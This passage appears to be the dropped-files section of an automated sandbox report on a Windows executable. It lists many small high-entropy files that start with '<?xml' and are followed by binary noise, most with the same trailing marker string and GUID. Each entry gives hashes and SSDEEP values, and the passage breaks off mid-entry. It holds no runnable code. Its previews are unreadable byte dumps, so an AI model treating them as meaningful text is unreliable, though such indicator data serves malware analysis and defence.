              Preview:<?xml..7..~#M..IE'F..@^+...'e..]...1.&...B..i..}........2?N.c..%n7........f.0......G............jmg...w.,..S..I8.."....W.n/..k._....u.DW..X.KV.....U+..]E.....r..h.F.KZ.".B..#.....K.....)....a....l..4..l>.i?.....~...~.r.....H=....#..$.^Z.X.6..^..K...G.n.Z..HDa.l.b6.Nn|l.....%..f....O....#-ec"..[L.}.....b.(..c.-.....b_UN....T...64..V='..g..E.m.`H.. .. Ca&".MF.L........d0..;.ilf.8N.....N...P......0.]v.zT.....k.....',...e....Z@d......G.Q..8..}....6......&'..D.......)r..j......;.k.4.z;HF.%dM....`"...Y....s.{....~W.Ve.Q>....^.i....L.r.S=..Q.B.F....b/a8..]<<...!Y."7*...{.........Wv..*f....H`V#..$ax^ "...B-.(?.....4 ....(Op...?.{.~S...=...Y.!.....MB;..e.h..g...u.`.).....0Z..7..*...g.&Y..._...........Y..7.!.4O7...#0...Si..J.....(Y`9V...8v.[.a.7y...x9....X...%.....@.\..........Og.].../...F..|......x.t....aQ1.."...*.m".......R..2I.....!.f.......IEK..N...Y........q.yz.M.y;..Zz..a{E.B<.o....-0..Pm....Z9t5...#Sr..&.....T...........~.x9Y`u.....b..b
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1662
              Entropy (8bit):7.878302556384948
              Encrypted:false
              SSDEEP:48:Nad6N4EICgqZBi/3/O51hq6iaqOmZIVLJkyyC++lKxD:NawuZHMi/vw1A6vqSVG1GM
              MD5:E324325CEE78C87A8F1E02743F5A8E5D
              SHA1:20EAF4778CA0AD927049369CF2626B0439DB3105
              SHA-256:BB69DD2B4E107EE3A399E30ECAF848D1F00B7B43EF5D4F014DA36B9D3D4D4A3B
              SHA-512:B266C286CE18CC28B418DFEE8058EA007FADCEF220DC537A00629E4333C2650E922B9403EF4CCBF8E8A7E0418AE8723805CAF7D8CC4FC0209725DA08CEFEE563
              Malicious:false
              Preview:<?xmlR+....B.~.bW...Vd.f....RS.....%......J4I.x%ZR....T..$'LL...c. ...o..i....`$.......n.Z./.u.#.yM..N5vM...b]o.7.INt.6.N.!h4m.....9.............;....tP..:R.<........,... ...U....&e...a..*...V..Q..4...V..pU..T..z..n..ND......s..ke..Y:.;..U.........IE.1.I...Z....%.......}..~7.L./.,..$.n......I...J.....IX....B...`%OcZ.+..-.4x..DQ3.I1p........oI#.T)..Ef..[....{e......9....W....dH..{...k...su...o.|.{,<.w.`...d.J.g..4g.....p.cn..ucZ..........HU...tow.h...d.5..P.&.....i.k...j.....n.,.cx!^N..c%..Q`.#6..d...x|.'...L@<h`....#:.7s..*.k........&Ajr..>.:...@....$..+.(..d..:....2?.T.........KDu.YDff...m.i............r=.s<.v 2s=..*..X1v....x..t...O..J.A`..&.B....R.H..-.'.mMZ.... .r..wR4..L%..X...m.".D....*&...J...M4..\L..^2...g.........{...[.L.f(oD..{uPQ.e.-....r..3.0.eVI%.z..eC..|.....n.K. ....J=.L...`....O..*....t...E@...j..8..-.x.....K7l..|8..b`...S..x..x0i.uT>?..a..t....U......i..s.N...?...8.D.U.8,..D.O.o......#..Y.H...DL*Y...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):831
              Entropy (8bit):7.719790218127681
              Encrypted:false
              SSDEEP:24:2/7yGKGFHpteRIJgjmN0CWLM9Pbd8dELmYbD:2/7ynSWRIJgjmN7J9PbqdimCD
              MD5:E49FC7CC41E3A3357F88B5D73DF094F1
              SHA1:0F7D55DFBD5062B70C268459E8B42D5B071A391A
              SHA-256:327A62AD6EEA4E9554414E146070272497C3C59D16379902A980601B3C0DB0FA
              SHA-512:634676E5AC3E8059962F830C9CC817AB9AA33456292D14B19280EE143C74F7068E7F7FDC3DEED0EB54677E390D73875BE9B7648E75473B866EFEAF8A877CF4F7
              Malicious:false
              Preview:<?xmlD...!.P.\.P....E.......=h!Y/lX)......TB. ...|...]T.j..ml.tO..R#...L....=J.J..[.R..4w@>J...y^./..:,..a..F|]j..|....v.w...~....C......C.%H.K...ezq.%..T_J0..D^.t.).k.i5..|..Xi.".xp_..Y....7.yE..|.Sp.....z.......l.d..V.;...*+..O...[....-.T./...y..x...xl.kG...b.r.-.u.z.sFoJ..Fk.[.<.I...I..4r..........,UY...q.In.....+..n.&.R..j=.I.^8.cL..okJ....S..x..q......FQQ.J...0.0.U.)l..b....z81Q&E.U...KRvv........d)..5.!2...{...;..F4.F,...r..fH...6..6...n-".!._.X..ih...]5...)c>...g=.w/.b..........V .S..L..,m.......h..Q2..J......I...N..pYW..*j.k.by&n...n..^...J!.B..e51.hV.."..9l.K.D}..o..&F.F...D0dh.Np.+...*l.f..Z..o.3..y.$HAE.e`.TK.s...?X.[W."r..F.e_...4.'Q`6.........+.........I."[.n?...t.:.0F...2=....6....C5.....[Rtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1485
              Entropy (8bit):7.883031030069038
              Encrypted:false
              SSDEEP:24:YMTzt2yYH1u9ztscPDk53MRn+EnL3h5NuiRfdwqiJh+eNLnQzkHXp42DmbMvSbD:YMTR2jHEBtsIDau+ebh5Nuef0HzskG2w
              MD5:28F5E0E1C481F11CBC713FB6C926882E
              SHA1:D7A0C0B6F35611210B6A118B0AAE89C8748F93F0
              SHA-256:FE305DE464B93E250847E84F19F278F14E7C79F4D1E15F019AC868380A12BF6D
              SHA-512:9B39D75AC716F8736512235190497FCB0D17003376DFFE8039805D03964D07612F0D8514898B4518083604765989F1F52ABD187BDA6138423066336EB7BEBE25
              Malicious:false
              Preview:<?xmlGU.},..>....].`.....I^....at.!i.*....'x.c....Qw.zy...6m..../T>.i..V\;@u...&.\.8p...=J....c."!.P..`V'|=Xq..^....qo.9.....WS.......\N...-W:..$..M.QV...:9....!.yu........-L1 f.K...b.....7Zk?Z......!...|....}........>.?.y......J...G..?.`........vS.=....H.Q{.P........4...;.^5,Z2=t..v*....f:C.k.f..V......M......^...:.-..M......Yot......ET...2J.."*.......Z.......=.2...(pJ2#F.N.....${).V...#..JO.....)0....."2X...#whC<............_...c9.]V.WT....HM..JE .[..L@....@n6.Jr[.7..\.UV....y.s...J...($....t...g..g{...................%..2.?...JGk.J.#....s.g....[.CL..XZ..k..[bM.n..M..E......".~."EOp.p..g .\....B.P.. ./.Fq.......P.&8A..F..-...V$......^.>....q.....t...D..z..&0.+.:h...`..4..Ty...p....V'.7.....@]...\...F.V*....<..0.iNi.....?....Y.k..A.~p.A....)x.;8>D...u...c../.s....t..Y<.!.X..\...7....m......#E;..ar.f.....$."xH...O...|..........&...m.....Q...X..x.\.z5...8..9.......&.'....YQ...<.SfF!..B.KHV..X.._{.f...q.....=.....a/...>gh:..(F..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2088
              Entropy (8bit):7.9064820297563925
              Encrypted:false
              SSDEEP:48:78Qjaaj5nWrsVQYZYdgTKZdrDiwWX/fwx/ovkGu8Y0rl+Eb+YfwD:7tj99W/Yyd0KZNlIfG/oMGu8Y0rUFks
              MD5:A92CF33D986307B52EEFD81FC95F66B0
              SHA1:3F68C2496FDFC69D6EBA3EF118426E74FD9E23DF
              SHA-256:B229835CE2C4C83219DB3AC6DE06CF5DA0E80B49F4653FEE0A029A7BB3C73B70
              SHA-512:4E4C973F023F6F7756104FFC3CF9DFE9739190C721103F6F02A1A36D855D08D77ED08EA588B575B925CDD171683E7E9E51F649BBAF7DE695B653C5CE8466EB11
              Malicious:false
              Preview:<?xml.#.:.W..t!@9.i9..w..?m.nG.....l.-.7.....aQi.*.m]@..o....._YR.....|..X.h..B.V.x..3)...;..z.c*..t.4..1...vv.st..a..>.d.J..L..O....p.}h.....hG.,'N[$4..~....:*.;....<...KZ..K..7..<..Y..I...c,k.L.O{.....(f.UqGV?K@..@3^.32..h..W..H.l.t%I......1..|....+.z|..Zv.....Zb%%N.4..*.)*7...5...jO.c..\....|'.`6L.x.Q. ..Z...@z.ug.....(..8...[...........>.:....~...\i.5..?.(ED...<KI..D.W........i..u....?Abs.9_....2......e..lVmb)..d.T..PU m4...b...v.#.............m..oCc(..Jn..H...T...w....o.k.CWl{r0..........7.u...."I;.m....]3..h.....$(. .x.@.....s@tSN[.u......L.6.....+N..F$..jW.%.X'.........pJr...S..[.N.>A].-y...'...0..c....:.{.;{U.7./...+..E.).6S....-e.a...5..F.,..D~....4bn.v........w..... v-2.).D^.8..Bk...T....|.....\....,..B.j..-P./W,.}..........kv...Tb.......r....D...8XGYn....&.}...]/..{S......Cs[.=^gx=G.i}...r%..!S.S.0m$.u....0- M..9C......D....TR.r.toS..!7<[..[.....L|.j~4....7.Y...S...^..4.j....\{t......&...m..0y..s.%....3...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.717893478098493
              Encrypted:false
              SSDEEP:12:LGhPKRSr8dbdJz9e9AgEjG2NzjVUxCzr9Y0bSlnClUtpoY6PciNObwbWZ+Q/Tuk6:L6iC8dbdaWjXzeeMlC2tyPUigESZP/gX
              MD5:56771E2A1162BD742D01306E2F2AA6D4
              SHA1:A39EA888A8788E90D15340C884B8DC7473461558
              SHA-256:B7B3D13B4ED48AF35B2089EFF2064896491F6AAC240608049BE2A88A288B1ABE
              SHA-512:902FAF8A511D30354FE1484DD5613E93E6A2D87551987EB893F57BA5D3698F0B2B2649B7E6BA447973C3EB42DA78FF35A7D3C9F172F3E71B6A17902A845D24FD
              Malicious:false
              Preview:<?xml..h(....6.p.....E.9./I.. .....O.[....1....!Q...WgL^.....U.....f.aM....E.].b,/c\..=V.M.u;.*.H.u...{-t..QT.U.C.z..m..+......CU-A.>zn.T..w%...T/...k..k.n.(.(....X......O..2.._2N]]jS{tv1......D@.(#.Iide.,m.Rvk.YY...O..........~.%..h.eC.J....m"N 8H..%..b.d.a.A.c1Z..S.7....CNg".~.p...YW.q`..,....X@..))..D.7..6@..i.:.H,6....9...-.P.x7.$.R\>..z.-.....jEo...6.Y.P..<...r......o...4uP.......j.{M...`/....$..mY.G..:..Seq..}.#.buUN..K..u..S...0...H....O..B.aQ..|..Oq...v1>......(.vJ....%f.C.....i-.=....?....Y;Z..Eq.....vw.%..H.u.......[.....7....F4$......./._P4.2...[k..@.F..G(,.!.....v......8|xXb.(#....b......^G......**....yBI.....R...EJc...K.......A.Dj5.n.wdQtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):854
              Entropy (8bit):7.749296270766983
              Encrypted:false
              SSDEEP:24:O1fNocv7E6gtrxenhRDj6AJQazWYIx08qbD:uNo16gtrsbJrWd28ID
              MD5:046E73E04FB3D85B82B57C528B19CBBA
              SHA1:DC6BA3C4977CF36A94A7853EEE19D2EE335EB50C
              SHA-256:5D151BCDF078F91929D809A870232668F5D5606F096D9DB307EB060AB87D71AC
              SHA-512:FC0187F51B1932C7CA2F5761E546AB06B07BF00FFC90B45F4315D3F6E0C06A0DA47554E2D8F4BCFBDE59CFD02D2C7338F2E74DA78CED5400F6CEFDDA42C846BD
              Malicious:false
              Preview:<?xml..[U...d.!.m.8....?G.1...\.:..RQ.....*Ml....|.3q.......QNu...prH`sa...e.|B..W.WH].(..2S..Z'A..L.i...Q.|~J....3..[...{...?.e.FH\..U.....Bew..~O...7-.s)R!.>.g...2]9/@.H.4.h....K@#.|d.=...O.ot....OM.5O.J.8.....ru.[.tKZ...AM.....'....K.fj.lc.....2.....C..s....e....a......Sm.4]..l.`...^...!.%:CT.....El.t6......)W....:.o..C!...RO...aV......'.t........;.Va......3:...!.i~HX..`..L...U..'..e..0...K`2.E........x.......'..3...=.h.A19....e..[..>C.L..V.....I>..D..a.U.A7.J......K.EH....W.....#.&.....&..7.<.-......,f.....?.f......{..;m>.b2.......|.V.{..G...h..>^7$.......W..yn.x.](....$D.....6.>......al?"...25.....1.....\...<....U....*er..!.76X...:...M.L.j.#.0t}.../8............k.<i.X..]....)W%...I..4..{M.H.b%#..oM/...A9....&.....u..9tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1612
              Entropy (8bit):7.879733191668534
              Encrypted:false
              SSDEEP:48:xn+9CA9R3cdTb5NL/zYckqdP0fkFHDGmOHjiD5Q3f6WaqVD:NC3cRdNXYckmP3FHlOHjMQeqt
              MD5:0B3C8E06E70492271E5C125F78F0058E
              SHA1:9774FF9E0B440B1A9554BC19FB4493D8F70D8FE9
              SHA-256:5A977E6FD4D02804961AC004758F402FAEB8506875AA7DF4ACF4CC900870738D
              SHA-512:A23B1779D673915A4E6A52426CC1491C3C6D35448EF561B2443B3393B78E4458050D5A39C076E17CD7925BB2C874B6EF1EFE68AA5DC05D03FDE61865A464504E
              Malicious:false
              Preview:<?xml..1/(...BS.......rS...H..0W[..........3.o"g..I..z.fnq.......:....q......p.1....0.^.#..:.}..V....~.. b..u.].N.... kh...;...H.D.a.c.I..W.....)..,..)..)....6.;]....\.5...s.H|..S...Qt....V1...:...>.gE..mo......'..|..~m..Z%\_[m.g..c.M..c@.1y.....:N0..{..|I.4.~Z.*..w...+..[.pKw....w..I<Z..kV1e9-..hA.\4....=6.B.y\...=AY..$....@.^.SO.%_Xl.{.r...4....%.0I&.k.:.@....V6..;...T........4hK.`....v....`|q...X.....f...D.O...9.u..~}.U.Pb,..L...e.=K...M......-.`....6.(4...h#.^:ddI6?p.M..b_q,.....q.]B$..";h...P....3.6.(P._..;.98.).....dg[.+.3..x;..9x..i..v..mr.........M...I.K5D.1...c&..2..$|.d..j5..X).-..B.g.e.9.C..\%..q.*-.0..H.AS.~....!RA......1M~;..7...F..r..ar.H.7S~.....l.4,.k.N....:...X..*^.r8{s..8...W.J.._.Xc.#..q.+V.KB.G..h.x.y..UG~/".mla....+.......O...R.C..Y>.......%...)H..y....`b#!...0....'.}.........XZ..rsx.;}....SD.c..-.:...-....iq....b....^#..P....|,.wNA..c....M.f|Nq.[.........y.7.9V.....Du..{.{U........j^\.`).3x...7|.4...../5}...A...x6....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):747
              Entropy (8bit):7.711921269225699
              Encrypted:false
              SSDEEP:12:a0C9lzlwLu1WyxUGPvMpsg+tJZIv+Ac6ssu8nl8WMYrVtKWBukIcii9a:I5lMEWyxUG3MOgCDWVc6sRbYrzKbbD
              MD5:62A5ED623DDE034FEDC8F035893A07CE
              SHA1:76D9B901C2A9F0507DACA058A2080B2C5E4F94CB
              SHA-256:D1C38737EE2CDCF18615054003A9C7070A2E656B4C94D5ED52BDB796C6C70045
              SHA-512:46A57CF3632F6DF5803A36C7AF745B65891788C03312032C8B34D1FD690C53AD309CFBFEDB9DFA872ADC4DF8DB0D8309276FE36045654BAD76225A3E78C19E9E
              Malicious:false
              Preview:<?xmlS0.z...|.g.0....9(.lb.5.4..W....D..!F..._.,.5.\...n.bV.fknY{U.....0.2.....l..]...[;`.. U..m....j!p....F..j..q|.p.n$..F.......0....9.....r8.......iHI..$./>.O._.H....v....3.....H.~zr....l....ZK=v....{.%u..e1..+.Q.}....S.0Zs.k..o.....f....g'..;H.QO......d'@./X..1.:.W...aV.....k...{.t.n..bFZ...B...E".]......P.s}.5..D..bT...?.yv.......1........?3#...+%.. ....9..Q...Q.M...qj..Z.8.....@6...6W.s.p..F..2.5.[%..!...z..&...u..n.]~.J.%.....>..c?...T.y.wUR..z+..._...pq.D`.0#........f40...\_ymr..u.N.%Z{'.5FS_d..Z.;j..w..d...V.w2...u._..Z.(3.....H.P.HA...7K..c..Y.uD..}\.Jlf@.<$........m..,.h.~...A..n.+...G..!...H=...m.y2...S2,.U..1.m.}6]..).h;.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):742
              Entropy (8bit):7.732489110590473
              Encrypted:false
              SSDEEP:12:3ICiDRdWhM23GEAv9E7fidwcHBpRwN+f0Sky4FLE4L6Fxj/28hIZUz5eeBhgLb1e:3VitdWm1EyEGwKF/omFZvhI2Vw3SbD
              MD5:3AE39FC094B47D93A414AE254546D759
              SHA1:974F7FC4833086474764F942DBE02536B5165AB9
              SHA-256:D291A856FA1474F92EF0016105256731C4C201E641D2965FB74974E61517FC5B
              SHA-512:B3D76078F665235D530392D38666056019B84707062FCBBDDDD1A4F7638E018A068886AD224819306EA499244970B0370219C80FEF6C1204A248A38277D60F6F
              Malicious:false
              Preview:<?xml......L...!p...0.....X.BE..t.V.IH..2.6eb...jG..\....Z.D.TW..GI.o.Fq.N...f.D.Y=0*.dT....\u[.[.......).n.......5JwG....P.......D6.:/.{...R.'.m..HS...,...L....0L#..[...to.!..w.z.&...........V.n..]..i.....v,uN..l.......k.zS.8I.G...<.'..).<...d.?.{B...9./....y.~NP ....7nu(7...Q\.U0..{....[...J]..~..V....K".(v$....n!..1).......w.8..U.......WT.....|.....N(P.F.@t...Z4..Q3...3....VL.........`.;...,$...H.|.......D.0I5..|.. .....Cyy.K.#..O^.....j........4..{..r> .....<`..`..c4Fk.C9.<@@(..c.|....]....UJ.o.G.....0...Y...".;..}....I<.....z...eW.@.....~.nS..x.H+..C..`.1+tS..VUc$...g.M~.7S7..,&n.`$.i..r.7..$`..d.9.......}.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):756
              Entropy (8bit):7.718942421179701
              Encrypted:false
              SSDEEP:12:ZOJ4ahkPz4Z5y6ch/nVaHxAfMeZHBCBfEJ0Zl4zVBzZTTg77FFLukIcii9a:ZOJ7mMZUjVaH9YhqnlQBzVW7FF4bD
              MD5:C2BF7A44A9977D5FB508028198E19677
              SHA1:1F8C923D7C27CE87A029404D20242DFDA6FEE094
              SHA-256:D83C8E8FCC5B65D2C6FFEAB4E4022F894F34D1184D5E742F521D818D908C08BA
              SHA-512:65EDED2E8D955C833D1BC6072EA362ED6FCC890AA2669BDD45852FFDFAF961EA24B9A2B4B1296A835300F074B9B938D43A381320370304206F7B70EC404D3B76
              Malicious:false
              Preview:<?xml................ .........?..Dp....)...<.-.G\.!Uh........S. 1)....Bq.Q.e...6#..n...Hj1....Q2...C.q.e.~............~..S.Bu..`.(..l,`.A....a..^.IXm[..?b..ODM.K......=8K.....\...X...C.Z>..Dh5...3.v.............1H.<.m...3<..!...N90....<........N.Cd&....h..F..^%.=e1.....?..X....@....z[..ia'.f.1.<x.l.....4..."......... ?.A...K|...=?....<.r...8.u.Ms...)...%3.HB1......<.DI..^....y.n.M.#........9....X...i.!qF9.!u...7.@...E.q..m.r..'_.>/.Fm.....HB...^...yv.#...XY.Z....MO..3....~.c..+AhHv........$.X...K...v.....A.b.........==.Z.sk..Pb.s.R.&_~......(.B.....5....x.,..Q|{[.N..V..&...$t...@z...b.N: .Q.mV.......S...+..1..7,.r.XB.g..2...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):763
              Entropy (8bit):7.680137298667146
              Encrypted:false
              SSDEEP:12:UaBnHyry0YzPXvsYLZPLhVBkU+W8M9XrFY7lUoBtA6DGi/D9MmhGp9Gd+E7LtnuV:UapHX0UPXvsYLZjBJJY7lUkDH/DFQc+j
              MD5:C21D0A458F0B19FD198CCC59268A9509
              SHA1:73467EEA348457275CE516F229415F49FDB936DB
              SHA-256:4DA9F8F64E339FF22EC265520693D4B99093982970D92549293C6825CFA5590A
              SHA-512:7909D62558CCDC49847E2E6E129C26A8C4FE7F63C4A3E5DFAFABA25EC79266C0A49B30EF6710D7629DF4ECCF2E0B35FA7EAF90EF1B1D032DF6DE56EDE14CA3FD
              Malicious:false
              Preview:<?xml.`..a.{.....%.(.sow..W...m5......@(M;:/c..._I12J78.o..@...HG....lF........oV..Ka....>.4............`..i..`Ol.[..Z...k......e.!...^.{L...:I7j.....K9M....fn.4...u....g.-4Cp....."2.c......(.r...:...:......g..W...g..j......cg5..<].........2f..f..w..w.>.....C....T{..@.....L.'.&.\Z.Qg...... ^.%.`.qp.e/}.[..Z.........:~..c.2..(...5A.6.........D. ......&Y..he..I.L.......X..e..J._.{..S......M.Y......q.8.d...@40^..,O.....P..M..c.......1.,....I|...M...N..EbV.{vg..ad..c...a..F'-ln.OXBg!_c6.I.6...H._.FQ....,w..........7E:.r+X.T.A.G..|>a.<.[......]7=<......Ow...Y.Yci......@.P...j....0Gmo+H....5...e...O.e.%.k..u...h._.......i..O,}Q.....|W..`@|....;.Ntp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):956
              Entropy (8bit):7.800783523915877
              Encrypted:false
              SSDEEP:24:98geSVzVBIdUJflfHIdHqDPci9e5P5uMkxwbD:Fe4zmuflfHIADJ9e5P5uMwqD
              MD5:422CA501CE2D7E4C59253F0F064038E0
              SHA1:5049C159199A5562C63755B345889A7ABDAE44DA
              SHA-256:7082ED6DBC9B16E881CD32EC62EB7EE21CB9DFD4CB28F5C8B0008B919C44BC56
              SHA-512:D8E46A96F1B3463582599DCC35EF6E8FE1AE9F4A40BEC9D9A316D23C150C13E7828FF1454C11BAE54D6EAC92EBBFEE3508F8C6A5B8D620F57A74A20EACA5C894
              Malicious:false
              Preview:<?xml..j....V'.].....Bo....o7.&.....$...d1$.B...@.t'..q....y.O.%.].qhG..a.XA..w...'8s...[..A.#>.j........p.@.....<..=H...&a,.........t......^o.....w.g...(Cv......*..2...9..9.|...B.BP..m.ZQ.P7..n.U....}....I.U...6du%!!.H.ou.....+#.....=@..>.+...,..MF|..3*j..`.........p.0...j...^St..=.B...#.e..M.k`...>|.....`.i..k.......SZ......^......[k!..m...f.... ..M.jV.....Qy#.....`...b...T..X..<...k`.3....O.........'.%....9I.....'mCyM..c.....g.^.l_8.7<.X.v D8"v)[..Z.N}...&B..jq....d=kb..D....}......3....V....{...R.t .i...AZw.Y..m........Q..7M0......j.a..&A.......M.eo.[.L!.z......z..a.. .F.lWC..eU.....sj..kU...&..*...[..x.(d..#.#.NFP.vJ.d..s...R.....H_g...D.x.\...QEo...m.7.Q#.h.*.-,3i....|%.......&.0e.5&...[.2.hYW.%.s.r.l..?.,.iV...1...v..2H+d.D...b.Jor...qwg..Z.)F....Y...=5 ..4.....w.}....J./.c...."..'.?......>.y..]F.....b.t....F.....(.vytp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):837
              Entropy (8bit):7.670708925968345
              Encrypted:false
              SSDEEP:24:+YME1F09CBJtpGSJsob1ZfcJvCGWCM9m0bD:+ap1vpZfcRXEDD
              MD5:9AE60C2E924A8956490AF374F8C2891C
              SHA1:6C165D98E317A84A0CD90E0AF6A0B23D278AF615
              SHA-256:D94180621C4AB8C74035D91B6BE6784185387A9FDB93892775484EC9B0574D33
              SHA-512:F7DF567ACE3B15F225786E2AC12C76DBB3E4615FB653230EB03873DC2ACFF8D647290D08793DFD35F39F0D7B10E01BAC96323012F76E4262EE8D58190969D8C0
              Malicious:false
              Preview:<?xml.f..5%.p..G7A.....d..pjQ....\.q..Xppw...-....|.M.....G.9I...Aa....,.6..<mxpI%)....|.O.d.V.:.8...............L....[as....Z......l..`H.T...j.{.rZ..Q.Jh.zy..0Qd.L.+..mn....]...I-..".3..^........^..ys.-x..D;V.V......L9.q.!...+:......$...^@.h.a..>(...1..2I`..v....%*.Ny9.]...m.v.._......}.t.Q6[q...{..1d.@.H...-..b\aAeK...E3...e4.+.......*..RNz..~L.J ../IL...M.e......IA...d....D.ap....W.Ky...0.ch.9..f..gc2.cT9.g...|...^.g..YN........Jv...._.@.H...v...W.m.+A...9.J.f.3.?..D.......v.hQ....D....4.-..`..8mf9...'d.].b65M.`..._Qj.........B.@...M.Jd....6.....}..H..s...^K.............)......R.2.6.9.T.q.R..5J. `?K..]....R.H....o......_....d4$^TO7......V...]d..B"p..+@OGe/..d..Mz.<......T%.1...0...h.te4/....G~.<.T+'Z..l2gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):7.739217121290703
              Encrypted:false
              SSDEEP:12:O1cpOvOev9U0a+cCpKCy8uRnsbJb6HhAV9jEnZa9dZt6tJxnBf0uzXNFH5dkaYoe:OTvOu9UcLzyvRns9eAyaPSt5Hdx5sbD
              MD5:26F189A74C9E7B688B4B6AE29FBDBA88
              SHA1:40647BC77571421B1A026474088F83812AAB0DAE
              SHA-256:362783620352E8FA5174976794CE32FEEB25C493A8066B3C2EAFC5332CDFED53
              SHA-512:50FB9F6A0F55EAE7A5D0049C42F17F757E53B8360E5EEFAE6EFD11A038414EB9172687656B9F24957BB41F38E94DE926E227AD7E3EA3014B4C7E51DF5BB0924F
              Malicious:false
              Preview:<?xml....5.f.P.r.s.;..G.iH.yy....g...Dz?.W..=T../..4.............&1.E...../`[."r.8...SrG....h..d..>.......#..._6(D.%..O.=q.x...,4.)..^%NK.....t.....e...C.........8..j8.m.....M.....Q.h.V5..*(&..\,......j8Q....c..v.S..\..#........[V..;..e.3...........v.R....@c...l.Y|.7?.O.W.k.....O..Y..)q$......;."/..T..k..UB.......)P4......zX..3........^AZl...x..X.;.......Ao.....&...J4......'.y.J.....L....:.!T....X,.[....5..p.@Z.$p|o...0.@'..:Cg..<D.o.m#..E.~py.>jd....k..}.S..g..eJP..;.W..l*J$.z..d63t.Cj.d.....V..R. ..L..r.D..Gp:.W..._........LMS.!...c.i.h.D.0.-.t.Y....a>..........L....:..t..Lf.....3.....@..~.g........a..:_..G...'....?...M.......K.5...cn.o...I..{....X........8..hj31..W..V......9g.hh..h...1......S"^.E.n.fCQ.5z.....dtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):956
              Entropy (8bit):7.818622942234377
              Encrypted:false
              SSDEEP:24:F3c1Ef1wLdYlB2OLTbEGHBRbYvKikjWp/PbD:Fs181wpyB2OAMB5YgWp7D
              MD5:E5A5993B15D67FEEB8C65AB0B2245B76
              SHA1:F602CB11A6C699EB98D2A5CE8EA27E134C4D8295
              SHA-256:702F6EFA57473DB6BE1BF2FD1D15740FA30C721E0BFE1D206B1758CF9E3221B9
              SHA-512:1F3331992973CA5B0FB1805194A71CD5A45CCCAA467C320BBB78BC1B6CBB54C561ABEE776D5F119288274A28CC8778FE12983FE1794A687D5B06ED3BB3C3A1E3
              Malicious:false
              Preview:<?xml...7w.......K......~k...A...z.:.+I......O...NG1...-|../.p.f(...M...K....A...n.F+..B.L.XsL......AT..C....h(.....L.?.B............ }.......j..?.y.7....#..NY/".....pE.q........$.+rj.(........_P@.;.........6..O....@.....'./!.s.|;.as_..~..I)o...b.9..FT..H..........@...R..^..bVuX.o..OM.U7.O..E...P..U=..\O..;.;.......fS.h....Z.e.zQ..6..I..-D......1..Y:bc.......>2..+.f...a......z0%.V.....H....n...b.....#d.@......\.E..d....j...Vs.....w)MGaN...Qod....?..%.>pu...!S*+D?.F......|'x............_...].&.7...-...k.g..n......5sS./. 0i....Q...@.Bz.....\...I..:..~..*1...%....xL.....0.9........w....jF.H...}.N.....>)l1...._..O....r0.}.O.n...EYD....o;...0...e.?c3.........I.$..y.G;..B..G.B@...>%SU.v.$..T&.....Y..:.=)..+....9"..... T.!?..Wv.qwR....Z........'W.....V..|.A..... MQ.m.8..4a....#.\....k..5.....T.i..Y.I..{*.w..@..2.......K.u.).....jtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1135
              Entropy (8bit):7.826595341037829
              Encrypted:false
              SSDEEP:24:G1II9c0mCF5q4r1tasoWg74/cesQ/4fPaqdcTaHZoP8JkhBZU6pIbD:fIuDCmKtasKze7AnaitKP8JwBGiSD
              MD5:FD33E1D0C985FD1BD8C702C6F9EDAB11
              SHA1:42A944F99786BEE155E27D4D903369E46FFD5B57
              SHA-256:F347E22BBF6495BBD413BC87E2DBDF8A2B04AF1999C504E84C95BAD27D79436F
